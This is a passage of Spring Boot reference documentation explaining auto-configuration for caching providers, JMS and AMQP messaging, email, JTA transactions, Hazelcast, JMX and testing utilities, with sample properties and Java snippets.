caching, you can\nrequest Spring Boot to create a separate one that will only be used by the\n`CacheManager`:\n\n[source,properties,indent=0]\n----\n\tspring.cache.hazelcast.config=classpath:config\/my-cache-hazelcast.xml\n----\n\nTIP: If a separate `HazelcastInstance` is created that way, it is not registered\nin the application context.\n\n\n\n[[boot-features-caching-provider-infinispan]]\n==== Infinispan\nInfinispan has no default configuration file location so it must be specified explicitly\n(or the default bootstrap is used).\n\n[source,properties,indent=0]\n----\n\tspring.cache.infinispan.config=infinispan.xml\n----\n\nCaches can be created on startup via the `spring.cache.cache-names` property. If a custom\n`ConfigurationBuilder` bean is defined, it is used to customize them.\n\n\n\n[[boot-features-caching-provider-redis]]\n==== Redis\nIf Redis is available and configured, the `RedisCacheManager` is auto-configured. It is\nalso possible to create additional caches on startup using the `spring.cache.cache-names`\nproperty.\n\n\n\n[[boot-features-caching-provider-guava]]\n==== Guava\nIf Guava is present, a `GuavaCacheManager` is auto-configured. Caches can be created\non startup using the `spring.cache.cache-names` property and customized by one of the\nfollowing (in this order):\n\n1. A cache spec defined by `spring.cache.guava.spec`\n2. A `com.google.common.cache.CacheBuilderSpec` bean is defined\n3. A `com.google.common.cache.CacheBuilder` bean is defined\n\nFor instance, the following configuration creates `foo` and `bar` caches with a maximum\nsize of 500 and a _time to live_ of 10 minutes:\n\n[source,properties,indent=0]\n----\n\tspring.cache.cache-names=foo,bar\n\tspring.cache.guava.spec=maximumSize=500,expireAfterAccess=600s\n----\n\nBesides, if a `com.google.common.cache.CacheLoader` bean is defined, it is automatically\nassociated with the `GuavaCacheManager`.\n\n\n\n[[boot-features-caching-provider-simple]]\n==== Simple\nIf none of the other providers can be found, a simple implementation using a\n`ConcurrentHashMap` as the cache store is configured.
This is the default if no caching library is present in\nyour application.\n\n\n\n[[boot-features-messaging]]\n== Messaging\nThe Spring Framework provides extensive support for integrating with messaging systems:\nfrom simplified use of the JMS API using `JmsTemplate` to a complete infrastructure to\nreceive messages asynchronously. Spring AMQP provides a similar feature set for the\n'`Advanced Message Queuing Protocol`' and Spring Boot also provides auto-configuration\noptions for `RabbitTemplate` and RabbitMQ. There is also support for STOMP messaging\nnatively in Spring WebSocket and Spring Boot has support for that through starters and a\nsmall amount of auto-configuration.\n\n\n\n[[boot-features-jms]]\n=== JMS\nThe `javax.jms.ConnectionFactory` interface provides a standard method of creating a\n`javax.jms.Connection` for interacting with a JMS broker. Although Spring needs a\n`ConnectionFactory` to work with JMS, you generally won't need to use it directly yourself\nand you can instead rely on higher level messaging abstractions (see the\n{spring-reference}\/#jms[relevant section] of the Spring Framework reference\ndocumentation for details). Spring Boot also auto-configures the necessary infrastructure\nto send and receive messages.\n\n\n\n[[boot-features-activemq]]\n==== ActiveMQ support\nSpring Boot can also configure a `ConnectionFactory` when it detects that ActiveMQ is\navailable on the classpath. If the broker is present, an embedded broker is started and\nconfigured automatically (as long as no broker URL is specified through configuration).\n\nActiveMQ configuration is controlled by external configuration properties in\n`+spring.activemq.*+`. For example, you might declare the following section in\n`application.properties`:\n\n[source,properties,indent=0]\n----\n\tspring.activemq.broker-url=tcp:\/\/192.168.1.210:9876\n\tspring.activemq.user=admin\n\tspring.activemq.password=secret\n----\n\nSee\n{sc-spring-boot-autoconfigure}\/jms\/activemq\/ActiveMQProperties.{sc-ext}[`ActiveMQProperties`]\nfor more of the supported options.\n\nBy default, ActiveMQ creates a destination if it does not exist yet, so destinations are\nresolved against their provided names.\n\n\n\n[[boot-features-artemis]]\n==== Artemis support\nApache Artemis was formed in 2015 when HornetQ was donated to the Apache Foundation. All\nthe features listed in the <<boot-features-hornetq>> section below can be applied to\nArtemis. Simply replace `+++spring.hornetq.*+++` properties with `+++spring.artemis.*+++`\nand use `spring-boot-starter-artemis` instead of `spring-boot-starter-hornetq`.\n\nNOTE: You should not try to use Artemis and HornetQ at the same time.\n\n\n\n[[boot-features-hornetq]]\n==== HornetQ support\nSpring Boot can auto-configure a `ConnectionFactory` when it detects that HornetQ is\navailable on the classpath. If the broker is present, an embedded broker is started and\nconfigured automatically (unless the mode property has been explicitly set). The supported\nmodes are: `embedded` (to make explicit that an embedded broker is required and should\nlead to an error if the broker is not available on the classpath), and `native` to connect\nto a broker using the `netty` transport protocol.
When the latter is configured, Spring\nBoot configures a `ConnectionFactory` connecting to a broker running on the local machine\nwith the default settings.\n\nNOTE: If you are using `spring-boot-starter-hornetq` the necessary dependencies to\nconnect to an existing HornetQ instance are provided, as well as the Spring infrastructure\nto integrate with JMS. Adding `org.hornetq:hornetq-jms-server` to your application allows\nyou to use the embedded mode.\n\nHornetQ configuration is controlled by external configuration properties in\n`+spring.hornetq.*+`. For example, you might declare the following section in\n`application.properties`:\n\n[source,properties,indent=0]\n----\n\tspring.hornetq.mode=native\n\tspring.hornetq.host=192.168.1.210\n\tspring.hornetq.port=9876\n----\n\nWhen embedding the broker, you can choose whether to enable persistence and list the\ndestinations that should be made available. These can be specified as a comma-separated\nlist to create them with the default options; or you can define bean(s) of type\n`org.hornetq.jms.server.config.JMSQueueConfiguration` or\n`org.hornetq.jms.server.config.TopicConfiguration`, for advanced queue and topic\nconfigurations respectively.\n\nSee\n{sc-spring-boot-autoconfigure}\/jms\/hornetq\/HornetQProperties.{sc-ext}[`HornetQProperties`]\nfor more of the supported options.\n\nNo JNDI lookup is involved at all and destinations are resolved against their names,\neither using the '`name`' attribute in the HornetQ configuration or the names provided\nthrough configuration.\n\n\n\n[[boot-features-jms-jndi]]\n==== Using a JNDI ConnectionFactory\nIf you are running your application in an Application Server Spring Boot will attempt to\nlocate a JMS `ConnectionFactory` using JNDI. By default the locations `java:\/JmsXA` and\n`java:\/XAConnectionFactory` will be checked. You can use the\n`spring.jms.jndi-name` property if you need to specify an alternative location:\n\n[source,properties,indent=0]\n----\n\tspring.jms.jndi-name=java:\/MyConnectionFactory\n----\n\n\n\n[[boot-features-using-jms-sending]]\n==== Sending a message\nSpring's `JmsTemplate` is auto-configured and you can autowire it directly into your own\nbeans:\n\n[source,java,indent=0]\n----\n\timport org.springframework.beans.factory.annotation.Autowired;\n\timport org.springframework.jms.core.JmsTemplate;\n\timport org.springframework.stereotype.Component;\n\n\t@Component\n\tpublic class MyBean {\n\n\t\tprivate final JmsTemplate jmsTemplate;\n\n\t\t@Autowired\n\t\tpublic MyBean(JmsTemplate jmsTemplate) {\n\t\t\tthis.jmsTemplate = jmsTemplate;\n\t\t}\n\n\t\t\/\/ ...\n\n\t}\n----\n\nNOTE: {spring-javadoc}\/jms\/core\/JmsMessagingTemplate.{dc-ext}[`JmsMessagingTemplate`]\ncan be injected in a similar manner.
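\nA method on the `MyBean` component above could then send a message as follows (the `someQueue` destination name is purely illustrative):\n\n[source,java,indent=0]\n----\n\tpublic void send(String message) {\n\t\t\/\/ converts the String payload to a JMS TextMessage and sends it\n\t\tthis.jmsTemplate.convertAndSend(\"someQueue\", message);\n\t}\n----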
\n\n\n\n[[boot-features-using-jms-receiving]]\n==== Receiving a message\n\nWhen the JMS infrastructure is present, any bean can be annotated with `@JmsListener` to\ncreate a listener endpoint. If no `JmsListenerContainerFactory` has been defined, a\ndefault one is configured automatically.\n\nThe default factory is transactional by default. If you are running in an infrastructure\nwhere a `JtaTransactionManager` is present, it will be associated with the listener\ncontainer by default. If not, the `sessionTransacted` flag will be enabled. In that latter\nscenario, you can associate your local data store transaction to the processing of an\nincoming message by adding `@Transactional` on your listener method (or a delegate\nthereof). This will make sure that the incoming message is acknowledged once the local\ntransaction has completed. This also includes any response messages that have been sent on\nthe same JMS session.\n\nThe following component creates a listener endpoint on the `someQueue` destination:\n\n[source,java,indent=0]\n----\n\t@Component\n\tpublic class MyBean {\n\n\t\t@JmsListener(destination = \"someQueue\")\n\t\tpublic void processMessage(String content) {\n\t\t\t\/\/ ...\n\t\t}\n\n\t}\n----\n\nTIP: Check {spring-javadoc}\/jms\/annotation\/EnableJms.{dc-ext}[the Javadoc of `@EnableJms`] for\nmore details.\n\n\n\n[[boot-features-amqp]]\n=== AMQP\nThe Advanced Message Queuing Protocol (AMQP) is a platform-neutral, wire-level protocol\nfor message-oriented middleware. The Spring AMQP project applies core Spring concepts to\nthe development of AMQP-based messaging solutions.\n\n\n\n[[boot-features-rabbitmq]]\n==== RabbitMQ support\nRabbitMQ is a lightweight, reliable, scalable and portable message broker based on the\nAMQP protocol. Spring uses RabbitMQ to communicate using the AMQP protocol.\n\nRabbitMQ configuration is controlled by external configuration properties in\n`+spring.rabbitmq.*+`. For example, you might declare the following section in\n`application.properties`:\n\n[source,properties,indent=0]\n----\n\tspring.rabbitmq.host=localhost\n\tspring.rabbitmq.port=5672\n\tspring.rabbitmq.username=admin\n\tspring.rabbitmq.password=secret\n----\n\nSee {sc-spring-boot-autoconfigure}\/amqp\/RabbitProperties.{sc-ext}[`RabbitProperties`]\nfor more of the supported options.\n\nTIP: Check http:\/\/spring.io\/blog\/2010\/06\/14\/understanding-amqp-the-protocol-used-by-rabbitmq\/[Understanding AMQP, the protocol used by RabbitMQ]\nfor more details.\n\n\n\n[[boot-features-using-amqp-sending]]\n==== Sending a message\nSpring's `AmqpTemplate` and `AmqpAdmin` are auto-configured and you can autowire them\ndirectly into your own beans:\n\n[source,java,indent=0]\n----\n\timport org.springframework.amqp.core.AmqpAdmin;\n\timport org.springframework.amqp.core.AmqpTemplate;\n\timport org.springframework.beans.factory.annotation.Autowired;\n\timport org.springframework.stereotype.Component;\n\n\t@Component\n\tpublic class MyBean {\n\n\t\tprivate final AmqpAdmin amqpAdmin;\n\t\tprivate final AmqpTemplate amqpTemplate;\n\n\t\t@Autowired\n\t\tpublic MyBean(AmqpAdmin amqpAdmin, AmqpTemplate amqpTemplate) {\n\t\t\tthis.amqpAdmin = amqpAdmin;\n\t\t\tthis.amqpTemplate = amqpTemplate;\n\t\t}\n\n\t\t\/\/ ...\n\n\t}\n----\n\nNOTE: {spring-amqp-javadoc}\/rabbit\/core\/RabbitMessagingTemplate.{dc-ext}[`RabbitMessagingTemplate`]\ncan be injected in a similar manner.\n\nAny `org.springframework.amqp.core.Queue` that is defined as a bean will be automatically\nused to declare a corresponding queue on the RabbitMQ instance if necessary.
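\nFor example, the following sketch declares such a queue (the `someQueue` name is illustrative only):\n\n[source,java,indent=0]\n----\n\timport org.springframework.amqp.core.Queue;\n\timport org.springframework.context.annotation.Bean;\n\timport org.springframework.context.annotation.Configuration;\n\n\t@Configuration\n\tpublic class QueueConfiguration {\n\n\t\t@Bean\n\t\tpublic Queue someQueue() {\n\t\t\t\/\/ declared on the broker automatically if it does not exist\n\t\t\treturn new Queue(\"someQueue\");\n\t\t}\n\n\t}\n----\n\nWith the queue in place, `this.amqpTemplate.convertAndSend(\"someQueue\", \"Hello\")` would route a message to it.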
\n\n\n\n[[boot-features-using-amqp-receiving]]\n==== Receiving a message\nWhen the Rabbit infrastructure is present, any bean can be annotated with\n`@RabbitListener` to create a listener endpoint. If no `RabbitListenerContainerFactory`\nhas been defined, a default one is configured automatically.\n\nThe following component creates a listener endpoint on the `someQueue` queue:\n\n[source,java,indent=0]\n----\n\t@Component\n\tpublic class MyBean {\n\n\t\t@RabbitListener(queues = \"someQueue\")\n\t\tpublic void processMessage(String content) {\n\t\t\t\/\/ ...\n\t\t}\n\n\t}\n----\n\nTIP: Check {spring-amqp-javadoc}\/rabbit\/annotation\/EnableRabbit.{dc-ext}[the Javadoc of `@EnableRabbit`]\nfor more details.\n\n\n\n[[boot-features-email]]\n== Sending email\nThe Spring Framework provides an easy abstraction for sending email using the\n`JavaMailSender` interface and Spring Boot provides auto-configuration for it as well as\na starter module.\n\nTIP: Check the {spring-reference}\/#mail[reference documentation] for a detailed\nexplanation of how you can use `JavaMailSender`.\n\nIf `spring.mail.host` and the relevant libraries (as defined by\n`spring-boot-starter-mail`) are available, a default `JavaMailSender` is created if none\nexists. The sender can be further customized by configuration items from the `spring.mail`\nnamespace; see the\n{sc-spring-boot-autoconfigure}\/mail\/MailProperties.{sc-ext}[`MailProperties`] for more\ndetails.
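\nAs a minimal sketch, the auto-configured sender can be injected and used like this (the recipient address is a placeholder):\n\n[source,java,indent=0]\n----\n\timport org.springframework.beans.factory.annotation.Autowired;\n\timport org.springframework.mail.SimpleMailMessage;\n\timport org.springframework.mail.javamail.JavaMailSender;\n\timport org.springframework.stereotype.Component;\n\n\t@Component\n\tpublic class NotificationService {\n\n\t\tprivate final JavaMailSender mailSender;\n\n\t\t@Autowired\n\t\tpublic NotificationService(JavaMailSender mailSender) {\n\t\t\tthis.mailSender = mailSender;\n\t\t}\n\n\t\tpublic void notifyAdmin(String text) {\n\t\t\tSimpleMailMessage message = new SimpleMailMessage();\n\t\t\tmessage.setTo(\"admin@example.com\"); \/\/ placeholder recipient\n\t\t\tmessage.setSubject(\"Notification\");\n\t\t\tmessage.setText(text);\n\t\t\tthis.mailSender.send(message);\n\t\t}\n\n\t}\n----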
\n\n\n\n[[boot-features-jta]]\n== Distributed Transactions with JTA\nSpring Boot supports distributed JTA transactions across multiple XA resources using\neither an http:\/\/www.atomikos.com\/[Atomikos] or https:\/\/github.com\/bitronix\/btm[Bitronix]\nembedded transaction manager. JTA transactions are also supported when deploying to a\nsuitable Java EE Application Server.\n\nWhen a JTA environment is detected, Spring's `JtaTransactionManager` will be used to\nmanage transactions. Auto-configured JMS, DataSource and JPA beans will be upgraded to\nsupport XA transactions. You can use standard Spring idioms such as `@Transactional` to\nparticipate in a distributed transaction. If you are within a JTA environment and still\nwant to use local transactions you can set the `spring.jta.enabled` property to `false` to\ndisable the JTA auto-configuration.\n\n\n\n=== Using an Atomikos transaction manager\nAtomikos is a popular open source transaction manager which can be embedded into your\nSpring Boot application. You can use the `spring-boot-starter-jta-atomikos` Starter POM to\npull in the appropriate Atomikos libraries. Spring Boot will auto-configure Atomikos and\nensure that appropriate `depends-on` settings are applied to your Spring beans for correct\nstartup and shutdown ordering.\n\nBy default Atomikos transaction logs will be written to a `transaction-logs` directory in\nyour application home directory (the directory in which your application jar file\nresides). You can customize this directory by setting a `spring.jta.log-dir` property in\nyour `application.properties` file. Properties starting with `spring.jta.` can also be used\nto customize the Atomikos `UserTransactionServiceImp`. See the\n{dc-spring-boot}\/jta\/atomikos\/AtomikosProperties.{dc-ext}[`AtomikosProperties` Javadoc]\nfor complete details.\n\nNOTE: To ensure that multiple transaction managers can safely coordinate the same\nresource managers, each Atomikos instance must be configured with a unique ID. By default\nthis ID is the IP address of the machine on which Atomikos is running. To ensure\nuniqueness in production, you should configure the `spring.jta.transaction-manager-id`\nproperty with a different value for each instance of your application.\n\n\n\n=== Using a Bitronix transaction manager\nBitronix is another popular open source JTA transaction manager implementation. You can\nuse the `spring-boot-starter-jta-bitronix` starter POM to add the appropriate Bitronix\ndependencies to your project. As with Atomikos, Spring Boot will automatically configure\nBitronix and post-process your beans to ensure that startup and shutdown ordering is\ncorrect.\n\nBy default Bitronix transaction log files (`part1.btm` and `part2.btm`) will be written to\na `transaction-logs` directory in your application home directory. You can customize this\ndirectory by using the `spring.jta.log-dir` property. Properties starting with `spring.jta.`\nare also bound to the `bitronix.tm.Configuration` bean, allowing for complete\ncustomization. See the\nhttps:\/\/github.com\/bitronix\/btm\/wiki\/Transaction-manager-configuration[Bitronix documentation]\nfor details.\n\nNOTE: To ensure that multiple transaction managers can safely coordinate the same\nresource managers, each Bitronix instance must be configured with a unique ID. By default\nthis ID is the IP address of the machine on which Bitronix is running. To ensure\nuniqueness in production, you should configure the `spring.jta.transaction-manager-id`\nproperty with a different value for each instance of your application.\n\n\n\n=== Using a Java EE managed transaction manager\nIf you are packaging your Spring Boot application as a `war` or `ear` file and deploying\nit to a Java EE application server, you can use your application server's built-in\ntransaction manager. Spring Boot will attempt to auto-configure a transaction manager by\nlooking at common JNDI locations (`java:comp\/UserTransaction`,\n`java:comp\/TransactionManager` etc). If you are using a transaction service provided by\nyour application server, you will generally also want to ensure that all resources are\nmanaged by the server and exposed over JNDI. Spring Boot will attempt to auto-configure\nJMS by looking for a `ConnectionFactory` at the JNDI path `java:\/JmsXA` or\n`java:\/XAConnectionFactory` and you can use the\n<<boot-features-connecting-to-a-jndi-datasource, `spring.datasource.jndi-name` property>>\nto configure your `DataSource`.\n\n\n\n=== Mixing XA and non-XA JMS connections\nWhen using JTA, the primary JMS `ConnectionFactory` bean will be XA aware and participate\nin distributed transactions. In some situations you might want to process certain JMS\nmessages using a non-XA `ConnectionFactory`.
For example, your JMS processing logic might\ntake longer than the XA timeout.\n\nIf you want to use a non-XA `ConnectionFactory` you can inject the\n`nonXaJmsConnectionFactory` bean rather than the `@Primary` `jmsConnectionFactory` bean.\nFor consistency the `jmsConnectionFactory` bean is also provided using the bean alias\n`xaJmsConnectionFactory`.\n\nFor example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t\/\/ Inject the primary (XA aware) ConnectionFactory\n\t@Autowired\n\tprivate ConnectionFactory defaultConnectionFactory;\n\n\t\/\/ Inject the XA aware ConnectionFactory (uses the alias and injects the same as above)\n\t@Autowired\n\t@Qualifier(\"xaJmsConnectionFactory\")\n\tprivate ConnectionFactory xaConnectionFactory;\n\n\t\/\/ Inject the non-XA aware ConnectionFactory\n\t@Autowired\n\t@Qualifier(\"nonXaJmsConnectionFactory\")\n\tprivate ConnectionFactory nonXaConnectionFactory;\n----\n\n\n\n=== Supporting an alternative embedded transaction manager\nThe {sc-spring-boot}\/jta\/XAConnectionFactoryWrapper.{sc-ext}[`XAConnectionFactoryWrapper`]\nand {sc-spring-boot}\/jta\/XADataSourceWrapper.{sc-ext}[`XADataSourceWrapper`] interfaces\ncan be used to support alternative embedded transaction managers. The interfaces are\nresponsible for wrapping `XAConnectionFactory` and `XADataSource` beans and exposing them\nas regular `ConnectionFactory` and `DataSource` beans which will transparently enroll in\nthe distributed transaction. DataSource and JMS auto-configuration will use JTA variants\nas long as you have a `JtaTransactionManager` bean and appropriate XA wrapper beans\nregistered within your `ApplicationContext`.\n\nThe {sc-spring-boot}\/jta\/BitronixXAConnectionFactoryWrapper.{sc-ext}[BitronixXAConnectionFactoryWrapper]\nand {sc-spring-boot}\/jta\/BitronixXADataSourceWrapper.{sc-ext}[BitronixXADataSourceWrapper]\nprovide good examples of how to write XA wrappers.\n\n\n\n[[boot-features-hazelcast]]\n== Hazelcast\n\nIf Hazelcast is on the classpath, Spring Boot will auto-configure a `HazelcastInstance`\nthat you can inject into your application. The `HazelcastInstance` is only created if a\nconfiguration is found.\n\nYou can define a `com.hazelcast.config.Config` bean and we'll use that. If your\nconfiguration defines an instance name, we'll try to locate an existing instance rather\nthan creating a new one.\n\nYou could also specify the `hazelcast.xml` configuration file to use via configuration:\n\n[source,properties,indent=0]\n----\n\tspring.hazelcast.config=classpath:config\/my-hazelcast.xml\n----\n\nOtherwise, Spring Boot tries to find the Hazelcast configuration from the default\nlocations, that is `hazelcast.xml` in the working directory or at the root of the\nclasspath. We also check if the `hazelcast.config` system property is set. Check the\nhttp:\/\/docs.hazelcast.org\/docs\/latest\/manual\/html-single\/[Hazelcast documentation] for\nmore details.\n\nNOTE: Spring Boot also has <<boot-features-caching-provider-hazelcast,explicit caching\nsupport for Hazelcast>>. The `HazelcastInstance` is automatically wrapped in a\n`CacheManager` implementation if caching is enabled.
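\nFor example, a `Config` bean along the following lines would be picked up (the instance name and map settings are arbitrary illustrations):\n\n[source,java,indent=0]\n----\n\timport com.hazelcast.config.Config;\n\n\timport org.springframework.context.annotation.Bean;\n\timport org.springframework.context.annotation.Configuration;\n\n\t@Configuration\n\tpublic class HazelcastConfiguration {\n\n\t\t@Bean\n\t\tpublic Config hazelcastConfig() {\n\t\t\tConfig config = new Config();\n\t\t\t\/\/ an existing instance with this name is reused rather than created\n\t\t\tconfig.setInstanceName(\"my-instance\");\n\t\t\tconfig.getMapConfig(\"default\").setTimeToLiveSeconds(300);\n\t\t\treturn config;\n\t\t}\n\n\t}\n----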
\n\n\n\n[[boot-features-integration]]\n== Spring Integration\nSpring Integration provides abstractions over messaging and also other transports such as\nHTTP, TCP etc. If Spring Integration is available on your classpath, it will be initialized\nthrough the `@EnableIntegration` annotation. Message processing statistics will be\npublished over JMX if `'spring-integration-jmx'` is also on the classpath. See the\n{sc-spring-boot-autoconfigure}\/integration\/IntegrationAutoConfiguration.{sc-ext}[`IntegrationAutoConfiguration`]\nclass for more details.\n\n\n\n[[boot-features-session]]\n== Spring Session\nSpring Session provides support for managing a user's session information. If you are\nwriting a web application and Spring Session and Spring Data Redis are both on the\nclasspath, Spring Boot will auto-configure Spring Session through its\n`@EnableRedisHttpSession` annotation. Session data will be stored in Redis and the session\ntimeout can be configured using the `server.session-timeout` property.\n\n\n\n[[boot-features-jmx]]\n== Monitoring and management over JMX\nJava Management Extensions (JMX) provide a standard mechanism to monitor and manage\napplications. By default Spring Boot will create an `MBeanServer` with bean id\n'`mbeanServer`' and expose any of your beans that are annotated with Spring JMX\nannotations (`@ManagedResource`, `@ManagedAttribute`, `@ManagedOperation`).\n\nSee the\n{sc-spring-boot-autoconfigure}\/jmx\/JmxAutoConfiguration.{sc-ext}[`JmxAutoConfiguration`]\nclass for more details.
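\nFor instance, the following bean would be exposed as an MBean (the attribute and operation names are illustrative; the object name is left to Spring's defaults here):\n\n[source,java,indent=0]\n----\n\timport org.springframework.jmx.export.annotation.ManagedAttribute;\n\timport org.springframework.jmx.export.annotation.ManagedOperation;\n\timport org.springframework.jmx.export.annotation.ManagedResource;\n\timport org.springframework.stereotype.Component;\n\n\t@Component\n\t@ManagedResource\n\tpublic class StatusBean {\n\n\t\tprivate volatile int counter;\n\n\t\t@ManagedAttribute\n\t\tpublic int getCounter() {\n\t\t\treturn this.counter;\n\t\t}\n\n\t\t@ManagedOperation\n\t\tpublic void reset() {\n\t\t\tthis.counter = 0;\n\t\t}\n\n\t}\n----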
\n\n\n\n[[boot-features-testing]]\n== Testing\nSpring Boot provides a number of useful tools for testing your application. The\n`spring-boot-starter-test` POM provides Spring Test, JUnit, Hamcrest and Mockito\ndependencies. There are also useful test utilities in the core `spring-boot` module under\nthe `org.springframework.boot.test` package.\n\n\n\n[[boot-features-test-scope-dependencies]]\n=== Test scope dependencies\nIf you use the\n`spring-boot-starter-test` '`Starter POM`' (in the `test` `scope`), you will find\nthe following provided libraries:\n\n* Spring Test -- integration test support for Spring applications.\n* JUnit -- The de-facto standard for unit testing Java applications.\n* Hamcrest -- A library of matcher objects (also known as constraints or predicates)\n allowing `assertThat` style JUnit assertions.\n* Mockito -- A Java mocking framework.\n\nThese are common libraries that we generally find useful when writing tests. You are free\nto add additional test dependencies of your own if these don't suit your needs.\n\n\n[[boot-features-testing-spring-applications]]\n=== Testing Spring applications\nOne of the major advantages of dependency injection is that it should make your code\neasier to unit test. You can simply instantiate objects using the `new` operator without\neven involving Spring. You can also use _mock objects_ instead of real dependencies.\n\nOften you need to move beyond '`unit testing`' and start '`integration testing`' (with\na Spring `ApplicationContext` actually involved in the process). It's useful to be able\nto perform integration testing without requiring deployment of your application or\nneeding to connect to other infrastructure.\n\nThe Spring Framework includes a dedicated test module for just such integration testing.\nYou can declare a dependency directly to `org.springframework:spring-test` or use the\n`spring-boot-starter-test` '`Starter POM`' to pull it in transitively.\n\nIf you have not used the `spring-test` module before you should start by reading the\n{spring-reference}\/#testing[relevant section] of the Spring Framework reference\ndocumentation.\n\n\n\n[[boot-features-testing-spring-boot-applications]]\n=== Testing Spring Boot applications\nA Spring Boot application is just a Spring `ApplicationContext` so nothing very special\nhas to be done to test it beyond what you would normally do with a vanilla Spring context.\nOne thing to watch out for though is that the external properties, logging and other\nfeatures of Spring Boot are only installed in the context by default if you use\n`SpringApplication` to create it.\n\nSpring Boot provides a `@SpringApplicationConfiguration` annotation as an alternative\nto the standard `spring-test` `@ContextConfiguration` annotation. If you use\n`@SpringApplicationConfiguration` to configure the `ApplicationContext` used in your\ntests, it will be created via `SpringApplication` and you will get the additional Spring\nBoot features.\n\nFor example:\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@RunWith(SpringJUnit4ClassRunner.class)\n\t@SpringApplicationConfiguration(SampleDataJpaApplication.class)\n\tpublic class CityRepositoryIntegrationTests {\n\n\t\t@Autowired\n\t\tCityRepository repository;\n\n\t\t\/\/ ...\n\n\t}\n----\n\nTIP: The context loader guesses whether you want to test a web application or not (e.g.\nwith `MockMvc`) by looking for the `@WebIntegrationTest` or `@WebAppConfiguration`\nannotations. (`MockMvc` and `@WebAppConfiguration` are part of `spring-test`).\n\nIf you want a web application to start up and listen on its normal port, so you can test\nit with HTTP (e.g. using `RestTemplate`), annotate your test class (or one of its\nsuperclasses) with `@WebIntegrationTest`. This can be very useful because it means you can\ntest the full stack of your application, but also inject its components into the test\nclass and use them to assert the internal state of the application after an HTTP\ninteraction. For example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@RunWith(SpringJUnit4ClassRunner.class)\n\t@SpringApplicationConfiguration(SampleDataJpaApplication.class)\n\t@WebIntegrationTest\n\tpublic class CityRepositoryIntegrationTests {\n\n\t\t@Autowired\n\t\tCityRepository repository;\n\n\t\tRestTemplate restTemplate = new TestRestTemplate();\n\n\t\t\/\/ ... interact with the running server\n\n\t}\n----\n\nNOTE: Spring's test framework will cache application contexts between tests. Therefore,\nas long as your tests share the same configuration, the time consuming process of starting\nand stopping the server will only happen once, regardless of the number of tests that\nactually run.\n\nTo change the port you can add environment properties to `@WebIntegrationTest` as colon-\nor equals-separated name-value pairs, e.g. `@WebIntegrationTest(\"server.port:9000\")`.\nAdditionally you can set the `server.port` and `management.port` properties to `0`\nin order to run your integration tests using random ports.
For example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@RunWith(SpringJUnit4ClassRunner.class)\n\t@SpringApplicationConfiguration(MyApplication.class)\n\t@WebIntegrationTest({\"server.port=0\", \"management.port=0\"})\n\tpublic class SomeIntegrationTests {\n\n\t\t\/\/ ...\n\n\t}\n----\n\nSee <<howto-discover-the-http-port-at-runtime>> for a description of how you can discover\nthe actual port that was allocated for the duration of the tests.\n\n\n\n[[boot-features-testing-spring-boot-applications-with-spock]]\n==== Using Spock to test Spring Boot applications\nIf you wish to use Spock to test a Spring Boot application you should add a dependency\non Spock's `spock-spring` module to your application's build. `spock-spring` integrates\nSpring's test framework into Spock.\n\nNOTE: The annotations <<boot-features-testing-spring-boot-applications,described above>>\ncan be used with Spock, i.e. you can annotate your `Specification` with\n`@WebIntegrationTest` to suit the needs of your tests.\n\n\n\n[[boot-features-test-utilities]]\n=== Test utilities\nA few test utility classes are packaged as part of `spring-boot` that are generally\nuseful when testing your application.\n\n\n\n[[boot-features-configfileapplicationcontextinitializer-test-utility]]\n==== ConfigFileApplicationContextInitializer\n`ConfigFileApplicationContextInitializer` is an `ApplicationContextInitializer` that\nyou can apply to your tests to load Spring Boot `application.properties` files. You can use\nthis when you don't need the full features provided by `@SpringApplicationConfiguration`.\n\n[source,java,indent=0]\n----\n\t@ContextConfiguration(classes = Config.class,\n\t\tinitializers = ConfigFileApplicationContextInitializer.class)\n----\n\n\n\n[[boot-features-environment-test-utilities]]\n==== EnvironmentTestUtils\n`EnvironmentTestUtils` allows you to quickly add properties to a\n`ConfigurableEnvironment` or `ConfigurableApplicationContext`. Simply call it with\n`key=value` strings:\n\n[source,java,indent=0]\n----\nEnvironmentTestUtils.addEnvironment(env, \"org=Spring\", \"name=Boot\");\n----\n\n\n\n[[boot-features-output-capture-test-utility]]\n==== OutputCapture\n`OutputCapture` is a JUnit `Rule` that you can use to capture `System.out` and\n`System.err` output. Simply declare the capture as a `@Rule` then use `toString()`\nfor assertions:\n\n[source,java,indent=0]\n----\nimport org.junit.Rule;\nimport org.junit.Test;\nimport org.springframework.boot.test.OutputCapture;\n\nimport static org.hamcrest.Matchers.*;\nimport static org.junit.Assert.*;\n\npublic class MyTest {\n\n\t@Rule\n\tpublic OutputCapture capture = new OutputCapture();\n\n\t@Test\n\tpublic void testName() throws Exception {\n\t\tSystem.out.println(\"Hello World!\");\n\t\tassertThat(capture.toString(), containsString(\"World\"));\n\t}\n\n}\n----\n\n[[boot-features-rest-templates-test-utility]]\n==== TestRestTemplate\n\n`TestRestTemplate` is a convenience subclass of Spring's `RestTemplate` that is useful in\nintegration tests. You can get a vanilla template or one that sends Basic HTTP\nauthentication (with a username and password). In either case the template will behave\nin a test-friendly way: not following redirects (so you can assert the response location),\nignoring cookies (so the template is stateless), and not throwing exceptions on\nserver-side errors.
It is recommended, but not mandatory, to use Apache HTTP Client\n(version 4.3.2 or better), and if you have that on your classpath the `TestRestTemplate`\nwill respond by configuring the client appropriately.\n\n[source,java,indent=0]\n----\npublic class MyTest {\n\n\tRestTemplate template = new TestRestTemplate();\n\n\t@Test\n\tpublic void testRequest() throws Exception {\n\t\tHttpHeaders headers = template.getForEntity(\"http:\/\/myhost.com\", String.class).getHeaders();\n\t\tassertThat(headers.getLocation().toString(), containsString(\"myotherhost\"));\n\t}\n\n}\n----\n\n\n\n[[boot-features-developing-auto-configuration]]\n== Creating your own auto-configuration\nIf you work in a company that develops shared libraries, or if you work on an open-source\nor commercial library, you might want to develop your own auto-configuration.\nAuto-configuration classes can be bundled in external jars and still be picked up by\nSpring Boot.\n\nAuto-configuration can be associated with a \"starter\" that provides the auto-configuration\ncode as well as the typical libraries that you would use with it. We will first cover what\nyou need to know to build your own auto-configuration and we will move on to the\n<<boot-features-custom-starter,typical steps required to create a custom starter>>.\n\nTIP: A https:\/\/github.com\/snicoll-demos\/spring-boot-master-auto-configuration[demo project]\nis available to showcase how you can create a starter step by step.\n\n\n\n[[boot-features-understanding-auto-configured-beans]]\n=== Understanding auto-configured beans\nUnder the hood, auto-configuration is implemented with standard 